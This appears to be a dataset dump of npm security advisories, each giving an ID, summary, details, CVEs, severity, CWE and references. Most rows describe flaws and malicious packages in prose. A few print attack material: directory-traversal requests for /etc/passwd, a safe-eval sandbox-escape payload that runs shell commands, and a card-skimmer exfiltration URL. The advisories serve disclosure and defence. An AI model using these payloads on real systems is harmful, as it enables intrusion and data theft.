ecosystem
stringclasses 14
values | vuln_id
stringlengths 10
19
| summary
stringlengths 4
267
⌀ | details
stringlengths 9
13.5k
| aliases
stringlengths 17
144
⌀ | modified_date
stringdate 2010-05-27 05:47:00
2022-05-10 08:46:52
| published_date
stringdate 2005-12-31 05:00:00
2022-05-10 08:46:50
| severity
stringclasses 5
values | score
float64 0
10
⌀ | cwe_id
stringclasses 988
values | refs
stringlengths 30
17.7k
⌀ | introduced
stringlengths 75
4.26k
⌀ |
|---|---|---|---|---|---|---|---|---|---|---|---|
npm
|
GHSA-rjhc-w3fj-j6x9
|
Malicious Package in alipayjsapi
|
All versions of `alipayjsapi` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
| null |
2021-09-30T18:35:42Z
|
2020-09-03T17:32:45Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1048'}
| null |
npm
|
GHSA-86wf-436m-h424
|
Resource Exhaustion Denial of Service in http-proxy-agent
|
A flaw was found in http-proxy-agent, prior to version 2.1.0. It was discovered http-proxy-agent passes an auth option to the Buffer constructor without proper sanitization. This could result in a Denial of Service through the usage of all available CPU resources and data exposure through an uninitialized memory leak in setups where an attacker could submit typed input to the auth parameter.
|
{'CVE-2019-10196'}
|
2021-03-31T21:09:25Z
|
2022-01-06T20:30:13Z
|
MODERATE
| null |
{'CWE-665'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2019-10196', 'https://bugzilla.redhat.com/show_bug.cgi?id=1567245', 'https://github.com/TooTallNate/node-http-proxy-agent/commit/b7b7cc793c3226aa83f820ce5c277e81862d32eb', 'https://www.npmjs.com/advisories/607'}
| null |
npm
|
GHSA-2mqv-4j3r-vjvp
|
Open redirect in @auth0/nextjs-auth0
|
### Overview
Versions `<=1.6.1` do not filter out certain `returnTo` parameter values from the login url, which expose the application to an open redirect vulnerability.
### Am I affected?
You are affected by this vulnerability if you are using `@auth0/nextjs-auth0` version `<=1.6.1`.
### How to fix that?
Upgrade to version `>=1.6.2`
### Will this update impact my users?
The fix provided in the patch will not affect your users.
|
{'CVE-2021-43812'}
|
2021-12-16T18:42:05Z
|
2021-12-16T18:52:21Z
|
MODERATE
| null |
{'CWE-601'}
|
{'https://github.com/auth0/nextjs-auth0/commit/0bbd9f8a0c93af51f607f28633b5fb18c5e48ad6', 'https://nvd.nist.gov/vuln/detail/CVE-2021-43812', 'https://github.com/auth0/nextjs-auth0/security/advisories/GHSA-2mqv-4j3r-vjvp', 'https://github.com/auth0/nextjs-auth0'}
| null |
npm
|
GHSA-j9wj-26p5-fj2v
|
Directory Traversal in gaoxuyan
|
Affected versions of `gaoxuyan` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
Example request:
```
GET /../../../../../../../../../../etc/passwd HTTP/1.1
host:foo
```
## Recommendation
No patch is available for this vulnerability.
It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
|
{'CVE-2017-16153'}
|
2020-08-31T18:21:00Z
|
2020-09-01T17:17:29Z
|
HIGH
| null |
{'CWE-22'}
|
{'https://www.npmjs.com/advisories/378', 'https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/gaoxuyan', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16153', 'https://nodesecurity.io/advisories/378'}
| null |
npm
|
GHSA-hx7j-43w2-7rj7
|
Prototype pollution in nconf-toml
|
Prototype pollution vulnerability in `nconf-toml` versions 0.0.1 through 0.0.2 allows an attacker to cause a denial of service and may lead to remote code execution.
|
{'CVE-2021-25946'}
|
2021-10-05T17:22:38Z
|
2021-06-07T22:12:13Z
|
CRITICAL
| null |
{'CWE-1321'}
|
{'https://github.com/RobLoach/nconf-toml', 'https://nvd.nist.gov/vuln/detail/CVE-2021-25946', 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25946', 'https://github.com/RobLoach/nconf-toml/blob/8ade08cd1cfb9691ab7cc5c3514cc05c5085918f/index.js#L8'}
| null |
npm
|
GHSA-7r96-8g3x-g36m
|
Improper Verification of Cryptographic Signature
|
### Impact
The `verifyWithMessage` method of `tEnvoyNaClSigningKey` always returns `true` for any signature of a SHA-512 hash matching the SHA-512 hash of the message even if the signature is invalid.
### Patches
Upgrade to `v7.0.3` immediately to resolve this issue. Since the vulnerability lies within the verification method, the previous signatures are still valid. We highly recommend reverifying any signatures that were previously verified with the vulnerable `verifyWithMessage` method.
### Workarounds
In `tenvoy.js` under the `verifyWithMessage` method definition within the `tEnvoyNaClSigningKey` class, ensure that the return statement call to `this.verify` ends in `.verified`. For example, the return statement should start with `return this.verify(signed, password).verified && ` instead of `return this.verify(signed, password) && `.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [github.com/TogaTech/tEnvoy](https://github.com/TogaTech/tEnvoy)
| null |
2022-01-04T19:36:52Z
|
2021-06-28T17:16:56Z
|
CRITICAL
| null |
{'CWE-347'}
|
{'https://github.com/TogaTech/tEnvoy/commit/a121b34a45e289d775c62e58841522891dee686b', 'https://github.com/TogaTech/tEnvoy', 'https://github.com/TogaTech/tEnvoy/security/advisories/GHSA-7r96-8g3x-g36m'}
| null |
npm
|
GHSA-mc84-xr9p-938r
|
High severity vulnerability that affects generator-jhipster
|
## Generated code uses repository configuration that downloads over HTTP instead of HTTPS
### Impact
Gradle users were using the http://repo.spring.io/plugins-release repositories in plain HTTP, and not HTTPS, so a man-in-the-middle attack was possible at build time.
### Patches
Maven users should at least upgrade to 6.3.0 while Gradle users should update to 6.3.1.
If you are not able to upgrade make sure not to use a Maven repository via `http` in your build file.
### Workarounds
Replace all custom repository definitions in `build.gradle` or `pom.xml` with their `https` version.
e.g.
```xml
<repository>
<id>oss.sonatype.org-snapshot</id>
<url>https://oss.sonatype.org/content/repositories/snapshots</url> // <-- must be httpS
<releases>
<enabled>false</enabled>
</releases>
<snapshots>
<enabled>true</enabled>
</snapshots>
</repository>
```
```gradle
maven { url "https://repo.spring.io/plugins-release" } // <-- must be httpS
```
### References
* https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
* https://max.computer/blog/how-to-take-over-the-computer-of-any-java-or-clojure-or-scala-developer/
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [https://github.com/jhipster/generator-jhipster/issues](https://github.com/jhipster/generator-jhipster/issues)
| null |
2021-09-15T18:50:22Z
|
2019-09-23T18:31:05Z
|
HIGH
| null |
{'CWE-829', 'CWE-494'}
|
{'https://github.com/advisories/GHSA-mc84-xr9p-938r', 'https://snyk.io/vuln/SNYK-JS-GENERATORJHIPSTER-536074', 'https://github.com/jhipster/generator-jhipster/security/advisories/GHSA-mc84-xr9p-938r', 'https://github.com/jhipster/generator-jhipster/'}
| null |
npm
|
GHSA-2hwp-g4g7-mwwj
|
Reflected Cross-Site Scripting in jquery.terminal
|
Versions of `jquery.terminal` prior to 1.21.0 are vulnerable to Reflected Cross-Site Scripting. If the application has either of the options `anyLinks` or `invokeMethods` set to true, the application may execute arbitrary JavaScript through crafted malicious payloads due to insufficient sanitization.
## Recommendation
Upgrade to version 1.21.0 or later
| null |
2020-08-31T18:35:05Z
|
2019-05-29T20:25:35Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://www.npmjs.com/advisories/769', 'https://github.com/jcubic/jquery.terminal/commit/c8b7727d21960031b62a4ef1ed52f3c634046211'}
| null |
npm
|
GHSA-rvg8-pwq2-xj7q
|
Out-of-bounds Read in base64url
|
Versions of `base64url` before 3.0.0 are vulnerable to to out-of-bounds reads as it allocates uninitialized Buffers when number is passed in input on Node.js 4.x and below.
## Recommendation
Update to version 3.0.0 or later.
| null |
2021-09-24T20:34:56Z
|
2020-09-01T20:42:44Z
|
MODERATE
| null |
{'CWE-125'}
|
{'https://hackerone.com/reports/321687', 'https://github.com/brianloveswords/base64url/pull/25', 'https://github.com/brianloveswords/base64url', 'https://www.npmjs.com/advisories/658'}
| null |
npm
|
GHSA-c56f-grv3-gpfr
|
Regular expression denial of service in forms
|
The package forms before 1.3.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via email validation.
|
{'CVE-2021-23388'}
|
2021-06-02T19:27:50Z
|
2021-06-07T22:10:13Z
|
MODERATE
| null |
{'CWE-400'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2021-23388', 'https://github.com/caolan/forms/pull/214/commits/d4bd5b5febfe49c1f585f162e04ec810f8dc47a0', 'https://snyk.io/vuln/SNYK-JS-FORMS-1296389', 'https://github.com/caolan/forms/pull/214'}
| null |
npm
|
GHSA-4hfc-fv33-ph9p
|
Malicious Package in sj-tw-abc
|
All versions of `sj-tw-abc` contain malicious code. The package downloads and runs a script that opens a reverse shell in the system.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
| null |
2021-10-01T16:15:37Z
|
2020-09-03T23:26:33Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1310'}
| null |
npm
|
GHSA-65q2-x652-xx84
|
Downloads Resources over HTTP in dalek-browser-ie
|
Affected versions of `dalek-browser-ie` insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `dalek-browser-ie`.
## Recommendation
No patch is currently available for this vulnerability, and the package author has marked the package as deprecated.
The best mitigation is currently to avoid using this package, using a different package if available.
Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
|
{'CVE-2016-10605'}
|
2021-01-08T19:46:44Z
|
2019-02-18T23:50:04Z
|
HIGH
| null |
{'CWE-311'}
|
{'https://github.com/advisories/GHSA-65q2-x652-xx84', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10605', 'https://nodesecurity.io/advisories/209', 'https://www.npmjs.com/advisories/209'}
| null |
npm
|
GHSA-jgrh-5m3h-9c5f
|
Web Cache Poisoning in find-my-way
|
This affects the package find-my-way before 2.2.5, from 3.0.0 and before 3.0.5. It accepts the Accept-Version' header by default, and if versioned routes are not being used, this could lead to a denial of service. Accept-Version can be used as an unkeyed header in a cache poisoning attack.
|
{'CVE-2020-7764'}
|
2020-11-10T20:19:42Z
|
2020-11-09T22:17:13Z
|
MODERATE
| null |
{'CWE-444'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2020-7764', 'https://www.npmjs.com/package/find-my-way', 'https://github.com/delvedor/find-my-way/commit/ab408354690e6b9cf3c4724befb3b3fa4bb90aac', 'https://snyk.io/vuln/SNYK-JS-FINDMYWAY-1038269'}
| null |
npm
|
GHSA-jvfv-jhw9-jmpp
|
Malicious Package in b5ffer-xor
|
Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
## Recommendation
Remove the package from your environment. Ensure no Ethereum funds were compromised.
| null |
2021-09-29T20:22:21Z
|
2020-09-03T21:23:09Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1228'}
| null |
npm
|
GHSA-8j36-q8x7-pm6q
|
OS Command Injection in systeminformation
|
This affects the package systeminformation before 4.30.2. The attacker can overwrite the properties and functions of an object, which can lead to executing OS commands.
|
{'CVE-2020-7778'}
|
2021-04-13T18:32:29Z
|
2022-02-09T23:14:11Z
|
HIGH
| null |
{'CWE-78'}
|
{'https://github.com/sebhildebrandt/systeminformation/blob/master/lib/internet.js', 'https://github.com/sebhildebrandt/systeminformation/commit/73dce8d717ca9c3b7b0d0688254b8213b957f0fa%23diff-970ae648187190f86bafc8f193b7538200eba164fad0674428b6487582c089cc', 'https://github.com/sebhildebrandt/systeminformation/commit/11103a447ab9550c25f1fbec7e6d903720b3fea8%23diff-970ae648187190f86bafc8f193b7538200eba164fad0674428b6487582c089cc', 'https://snyk.io/vuln/SNYK-JS-SYSTEMINFORMATION-1043753', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7778', 'https://gist.github.com/EffectRenan/b434438938eed0b21b376cedf5c81e80'}
| null |
npm
|
GHSA-x6wp-rfwh-hcx7
|
Regular Expression Denial of Service in content
|
Affected versions of `content` are vulnerable to a regular expression denial of service when parsing malicious `Content-Type` and `Content-Disposition` headers.
## Recommendation
Update to version 3.0.6 or later.
|
{'CVE-2017-16111'}
|
2020-08-31T18:26:37Z
|
2018-07-24T19:55:05Z
|
HIGH
| null |
{'CWE-400'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2017-16111', 'https://www.npmjs.com/advisories/530', 'https://github.com/advisories/GHSA-x6wp-rfwh-hcx7', 'https://nodesecurity.io/advisories/530'}
| null |
npm
|
GHSA-39pj-gq8q-9pfj
|
Authentication Weakness in keystone
|
Versions of `keystone` prior to 0.3.16 are affected by a partial authentication bypass vulnerability. In the default sign in functionality, if an attacker provides a full and correct password, yet only provides part of the associated email address, authentication will be granted.
## Recommendation
Update to version 0.3.16 or later.
|
{'CVE-2015-9240'}
|
2021-08-31T20:54:56Z
|
2018-06-07T19:43:20Z
|
HIGH
| null |
{'CWE-1255'}
|
{'https://nodesecurity.io/advisories/60', 'https://www.npmjs.com/package/keystone', 'https://nvd.nist.gov/vuln/detail/CVE-2015-9240', 'https://www.npmjs.com/advisories/60', 'https://github.com/advisories/GHSA-39pj-gq8q-9pfj'}
| null |
npm
|
GHSA-9mrq-cjgh-32g2
|
Low severity vulnerability that affects smartbanner.js
|
## rel noopener vulnerability
### Impact
Clicking on smartbanner _View_ link and navigating to 3rd party page leaves `window.opener` exposed. It may allow hostile 3rd parties to abuse `window.opener`, e.g. by redirection or injection on the original page with smartbanner.
### Patches
`rel="noopener"` is automatically populated to links as of `v1.14.1` which is a recommended upgrade to resolve the vulnerability.
### Workarounds
If you can not upgrade to `v1.14.1`:
1. Ensure _View_ link is only taking users to App Store or Google Play Store where security is guarded by respective app store security teams
2. If _View_ link is going to a 3rd party page, limit smartbanner.js to be used on iOS that decreases the scope of the vulnerability since as of Safari 12.1, `rel="noopener"` is imposed on all `target="_blank"` links.
Following combination of smartbanner meta tags can be used to achieve the above:
```html
<meta name="smartbanner:enabled-platforms" content="none">
<meta name="smartbanner:include-user-agent-regex" content="Mobile.*Safari">
```
### References
* [About rel=noopener](https://mathiasbynens.github.io/rel-noopener/)
* [Safari 12.1 Release Notes](https://developer.apple.com/documentation/safari_release_notes/safari_12_1_release_notes#3130296)
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [smartbanner.js](https://github.com/ain/smartbanner.js/issues/new)
| null |
2021-12-03T14:38:19Z
|
2019-09-13T13:22:33Z
|
LOW
| null | null |
{'https://github.com/advisories/GHSA-9mrq-cjgh-32g2', 'https://github.com/ain/smartbanner.js/', 'https://github.com/ain/smartbanner.js/security/advisories/GHSA-9mrq-cjgh-32g2'}
| null |
npm
|
GHSA-jchg-g94r-64qg
|
Malicious Package in mogobd
|
This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.
## Recommendation
Remove the package from your environment. There are no indications of further compromise.
| null |
2021-09-30T20:20:03Z
|
2020-09-03T19:50:10Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1132'}
| null |
npm
|
GHSA-4wcx-c9c4-89p2
|
Malicious Package in react-datepicker-plus
|
Versions 2.4.3 and 2.4.2 of `react-datepicker-plus` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
## Recommendation
Remove the package from your environment and evaluate your application to determine whether or not user data was compromised.
| null |
2021-09-30T22:08:42Z
|
2020-09-11T21:23:30Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/946'}
| null |
npm
|
GHSA-vjcj-5g2r-vxqc
|
Moderate severity vulnerability that affects editor.md
|
Pandao Editor.md 1.5.0 allows XSS via crafted attributes of an invalid IMG element.
|
{'CVE-2018-16330'}
|
2021-09-20T22:06:15Z
|
2018-09-06T03:22:00Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://github.com/advisories/GHSA-vjcj-5g2r-vxqc', 'https://nvd.nist.gov/vuln/detail/CVE-2018-16330', 'https://github.com/pandao/editor.md', 'https://github.com/pandao/editor.md/issues/612'}
| null |
npm
|
GHSA-9pcf-h8q9-63f6
|
Sandbox Breakout / Arbitrary Code Execution in safe-eval
|
All versions of `safe-eval` are vulnerable to Sandbox Escape leading to Remote Code Execution. A payload chaining a function's callee and caller constructors can escape the sandbox and execute arbitrary code.
For example, the payload
```
((() => {
const targetKey = Object.keys(this)[0];
Object.defineProperty(this, targetKey, {
get: function() {
return arguments.callee.caller.constructor(
"return global.process.mainModule.require('child_process').execSync('pwd').toString()"
)();
}
});
})();```
may be used to print the `pwd` to the console.
## Recommendation
No fix is currently available. Consider using an alternative package until a fix is made available.
| null |
2020-08-31T18:44:49Z
|
2020-09-03T17:12:41Z
|
HIGH
| null | null |
{'https://www.npmjs.com/advisories/1033'}
| null |
npm
|
GHSA-8hqw-qp6r-vqcm
|
Malicious Package in bitcoin-sweep
|
All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
| null |
2021-10-01T20:42:42Z
|
2020-09-04T16:40:00Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1366'}
| null |
npm
|
GHSA-hvxq-j2r4-4jm8
|
Regular Expression Denial of Service in sql-injection
|
All versions of `sql-injection` are vulnerable to Regular Expression Denial of Service. The package processes a request's body with regular expressions that may take exponentially longer to execute for large inputs.
## Recommendation
No fix is currently available. Consider using an alternative package until a fix is made available.
| null |
2020-08-31T18:49:33Z
|
2020-09-03T20:31:04Z
|
HIGH
| null | null |
{'https://www.npmjs.com/advisories/1163'}
| null |
npm
|
GHSA-j3rh-8vwq-wh84
|
Use of Cryptographically Weak Pseudo-Random Number Generator in JHipster Kotlin
|
JHipster Kotlin is using an insecure source of randomness to generate all of it's random values. JHipster Kotlin relies upon apache commons lang3 `RandomStringUtils`.
From the documentation:
> Caveat: Instances of Random, upon which the implementation of this class relies, are not cryptographically secure.
> \- https://commons.apache.org/proper/commons-lang/javadocs/api-3.9/org/apache/commons/lang3/RandomStringUtils.html
Here are the examples of JHipster Kotlin'ss use of an insecure PRNG:
https://github.com/jhipster/jhipster-kotlin/blob/193ae8f13c0be686f9687e78bacfedb144c47d8c/generators/server/templates/src/main/kotlin/package/service/util/RandomUtil.kt.ejs#L32
## Proof Of Concepts Already Exist
There has been a POC of taking one RNG value generated `RandomStringUtils` and reversing it to generate all of the past/future RNG values public since March 3rd, 2018.
https://medium.com/@alex91ar/the-java-soothsayer-a-practical-application-for-insecure-randomness-c67b0cd148cd
POC Repository: https://github.com/alex91ar/randomstringutils
## Potential Impact Technical
All that is required is to get one password reset token from a JHipster Kotlin generated service and using the POC above, you can reverse what all future password reset tokens to be generated by this server. This allows an attacker to pick and choose what account they would like to takeover by sending account password reset requests for targeted accounts.
## Potential Impact Scale
Not as large as for the original jhipster project as the kotlin blueprint is not that widely used.
### Patches
Update your generated applications to > 1.2.0
### Workarounds
Change the content of `RandomUtil.kt` like this:
```kotlin
import java.security.SecureRandom
import org.apache.commons.lang3.RandomStringUtils
private const val DEF_COUNT = 20
object RandomUtil {
private val secureRandom: SecureRandom = SecureRandom()
init {
secureRandom.nextBytes(byteArrayOf(64.toByte()))
}
private fun generateRandomAlphanumericString(): String {
return RandomStringUtils.random(DEF_COUNT, 0, 0, true, true, null, secureRandom)
}
/**
* Generate a password.
*
* @return the generated password.
*/
fun generatePassword(): String = generateRandomAlphanumericString()
}
```
Important is to exchange **every** call of `RandomStringUtils.randomAlphaNumeric`.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [JHipster Kotlin](https://github.com/jhipster/jhipster-kotlin)
|
{'CVE-2019-16303'}
|
2021-09-22T18:41:06Z
|
2020-06-26T16:48:13Z
|
CRITICAL
| null |
{'CWE-338'}
|
{'https://github.com/jhipster/generator-jhipster/commit/88448b85fd3e8e49df103f0061359037c2c68ea7', 'https://nvd.nist.gov/vuln/detail/CVE-2019-16303', 'https://lists.apache.org/thread.html/rc3f00f5d3d2ec0e2381a3b9096d5f5b4d46ec1587ee7e251a3dbb897@%3Cissues.commons.apache.org%3E', 'https://lists.apache.org/thread.html/rc87fa35a48b5d70b06af6fb81785ed82e82686eb83307aae6d250dc9@%3Cissues.commons.apache.org%3E', 'https://www.npmjs.com/advisories/1188', 'https://github.com/jhipster/generator-jhipster/issues/10401', 'https://github.com/jhipster/jhipster-kotlin/security/advisories/GHSA-j3rh-8vwq-wh84', 'https://www.npmjs.com/advisories/1187', 'https://github.com/jhipster/generator-jhipster/security/advisories/GHSA-mwp6-j9wf-968c', 'https://github.com/jhipster/jhipster-kotlin/issues/183', 'https://www.jhipster.tech/2019/09/13/jhipster-release-6.3.0.html', 'https://snyk.io/vuln/SNYK-JS-GENERATORJHIPSTER-466980', 'https://lists.apache.org/thread.html/r6d243e7e3f25daeb242dacf3def411fba32a9388d3ff84918cb28ddd@%3Cissues.commons.apache.org%3E', 'https://github.com/jhipster/generator-jhipster'}
| null |
npm
|
GHSA-j88m-953w-8r2c
|
Moderate severity vulnerability that affects rendertron
|
Error reporting within Rendertron 1.0.0 allows reflected Cross Site Scripting (XSS) from invalid URLs.
|
{'CVE-2017-18352'}
|
2021-09-14T19:19:42Z
|
2019-01-07T19:14:21Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://github.com/GoogleChrome/rendertron', 'https://nvd.nist.gov/vuln/detail/CVE-2017-18352', 'https://github.com/GoogleChrome/rendertron/pull/88', 'https://github.com/advisories/GHSA-j88m-953w-8r2c', 'https://bugs.chromium.org/p/chromium/issues/detail?id=759111', 'https://github.com/GoogleChrome/rendertron/commit/8d70628c96ae72eff6eebb451d26fc9ed6b58b0e'}
| null |
npm
|
GHSA-gmch-cm2p-9qw9
|
Cross-site Scripting in lightning-server
|
This affects all versions of package lightning-server. It is possible to inject malicious JavaScript code as part of a session controller.
|
{'CVE-2020-7747'}
|
2021-04-21T18:19:08Z
|
2021-05-10T18:39:15Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://snyk.io/vuln/SNYK-JS-LIGHTNINGSERVER-1019381', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7747', 'https://github.com/lightning-viz/lightning/blob/master/app/controllers/session.js%23L230'}
| null |
npm
|
GHSA-h466-j336-74wx
|
Prototype Pollution in mpath
|
Versions of `mpath` before 0.5.1 are vulnerable to prototype pollution. Provided certain input `mpath` can add or modify properties of the `Object` prototype. These properties will be present on all objects.
## Recommendation
Update to version `0.5.1` or later.
|
{'CVE-2018-16490'}
|
2020-08-31T18:35:26Z
|
2019-02-07T18:17:26Z
|
MODERATE
| null |
{'CWE-400'}
|
{'https://hackerone.com/reports/390860', 'https://github.com/advisories/GHSA-h466-j336-74wx', 'https://www.npmjs.com/advisories/779', 'https://nvd.nist.gov/vuln/detail/CVE-2018-16490'}
| null |
npm
|
GHSA-6r7x-hc8m-985r
|
Cross-site Scripting in Joplin
|
Joplin through 1.0.184 allows Arbitrary File Read via Cross-site Scripting (XSS).
|
{'CVE-2020-9038'}
|
2022-01-04T19:44:56Z
|
2020-10-13T17:29:25Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://github.com/laurent22/joplin/commit/3db47b575b9cb0a765da3d283baa2c065df0d0bc', 'https://nvd.nist.gov/vuln/detail/CVE-2020-9038', 'https://github.com/laurent22/joplin', 'http://packetstormsecurity.com/files/156582/Joplin-Desktop-1.0.184-Cross-Site-Scripting.html', 'https://github.com/laurent22/joplin/compare/clipper-1.0.19...clipper-1.0.20'}
| null |
npm
|
GHSA-92qm-hc53-jjrj
|
Downloads Resources over HTTP in ibapi
|
Affected versions of `ibapi` insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `ibapi`.
## Recommendation
No patch is currently available for this vulnerability.
The best mitigation is currently to avoid using this package, using a different package if available.
Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
|
{'CVE-2016-10593'}
|
2021-09-16T20:44:02Z
|
2019-02-18T23:34:17Z
|
HIGH
| null |
{'CWE-269', 'CWE-311'}
|
{'https://gitlord.com/summary/~dchem%2Fnode-ibapi-addon.git', 'https://nodesecurity.io/advisories/182', 'https://www.npmjs.com/advisories/182', 'https://gitlord.com/r/~dchem/node-ibapi-addon.git', 'https://gitlord.com/commitdiff/~dchem%2Fnode-ibapi-addon.git/c00dd7c98cca0423052148337e523eeb7776da68', 'https://www.npmjs.com/package/ibapi/v/2.5.6', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10593'}
| null |
npm
|
GHSA-78j5-gcmf-vqc8
|
Cross-Site Scripting (XSS) in Verdaccio
|
### Impact
What kind of vulnerability is it? Who is impacted?
Cross-Site Scripting XSS, malicious packages with content Javascript that might be executed in the User Interface stealing user credentials.
### Patches
Has the problem been patched? What versions should users upgrade to?
Users that still using `v3` must upgrade to **>3.12.0** or those have no problem to migrate to a major version **>=4.0.0** also fix the issue.
### Workarounds
Is there a way for users to fix or remediate the vulnerability without upgrading?
No, the users must update.
### References
Are there any links users can visit to find out more?
https://www.npmjs.com/advisories/832
https://www.npmjs.com/advisories/833
The issue was reported by the NPMJS Security Team
### For more information
If you have any questions or comments about this advisory:
* Read the Security Policy to find the ways to be in contact with us.
|
{'CVE-2019-14772'}
|
2021-10-06T22:02:18Z
|
2019-05-29T18:02:59Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://www.npmjs.com/advisories/832', 'https://github.com/verdaccio/verdaccio/security/advisories/GHSA-78j5-gcmf-vqc8', 'https://nvd.nist.gov/vuln/detail/CVE-2019-14772', 'https://github.com/verdaccio/verdaccio', 'https://www.npmjs.com/advisories/833'}
| null |
npm
|
GHSA-rrvm-gqq8-q2wx
|
Malicious Package in require-port
|
Version 1.0.0 of `require-port` contains malicious code as a preinstall script. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When installed, the package downloads a file from a remote server, executes it and opens a backdoor.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
| null |
2021-09-29T20:45:41Z
|
2020-09-03T21:05:26Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1197'}
| null |
npm
|
GHSA-9gqh-q4cx-f2h9
|
Downloads Resources over HTTP in ipip
|
Affected versions of `ipip` insecurely downloads resources over HTTP.
In scenarios where an attacker has a privileged network position, they can modify or read such resources at will. While the exact severity of impact for a vulnerability like this is highly variable and depends on the behavior of the package itself, it ranges from being able to read sensitive information all the way up to and including remote code execution.
## Recommendation
No patch is currently available for this vulnerability, and the README states that the package is deprecated.
The best mitigation is currently to avoid using this package, using a different package if available.
Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
|
{'CVE-2016-10594'}
|
2021-09-16T20:43:33Z
|
2019-02-18T23:50:41Z
|
HIGH
| null |
{'CWE-269', 'CWE-311'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2016-10594', 'https://github.com/ChiChou/node-ipip', 'https://nodesecurity.io/advisories/184', 'https://www.npmjs.com/advisories/184'}
| null |
npm
|
GHSA-wfp9-vr4j-f49j
|
NoSQL Injection in sequelize
|
Versions of `sequelize` prior to 4.12.0 are vulnerable to NoSQL Injection. Query operators such as `$gt` are not properly sanitized and may allow an attacker to alter data queries, leading to NoSQL Injection.
## Recommendation
Upgrade to version 4.12.0 or later
| null |
2020-08-31T18:36:59Z
|
2019-06-04T20:04:27Z
|
HIGH
| null |
{'CWE-89'}
|
{'https://snyk.io/vuln/SNYK-JS-SEQUELIZE-174147', 'https://www.npmjs.com/advisories/820', 'https://www.npmjs.com/advisories/820/versions', 'https://github.com/sequelize/sequelize/issues/7310'}
| null |
npm
|
GHSA-qh38-wrgf-cj2c
|
Directory Traversal in iter-server
|
Affected versions of `iter-server` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
Example request:
```
GET /../../../../../../../../../../etc/passwd HTTP/1.1
host:foo
```
## Recommendation
No patch is available for this vulnerability.
It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
|
{'CVE-2017-16183'}
|
2020-08-31T18:23:46Z
|
2020-09-01T18:48:05Z
|
HIGH
| null |
{'CWE-22'}
|
